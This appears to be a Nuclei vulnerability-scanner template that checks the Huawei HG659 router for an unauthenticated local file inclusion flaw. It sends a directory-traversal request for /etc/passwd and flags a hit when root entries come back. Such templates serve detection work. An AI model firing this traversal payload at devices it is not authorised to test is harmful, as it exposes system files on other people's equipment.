id: huawei-hg659-lfi

info:
  name: HUAWEI HG659 - Local File Inclusion
  author: pikpikcu
  severity: high
  description: HUAWEI HG659 is vulnerable to local file inclusion.
  reference:
    - https://twitter.com/sec715/status/1406782172443287559
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: lfi,huawei

http:
  - method: GET
    path:
      - "{{BaseURL}}/lib///....//....//....//....//....//....//....//....//etc//passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
        condition: and

      - type: status
        status:
          - 200

# digest: 4a0a0047304502200c9c36390a81ab0c4ceb30c98b973002a4f140a9bb82bddcca2d0111afc7274e022100d2fcecba5c6f17247dfa554285cc4b748ad1de854a29c32690ac10931e2e365c:922c64590222798bb761d5b6d8e72950
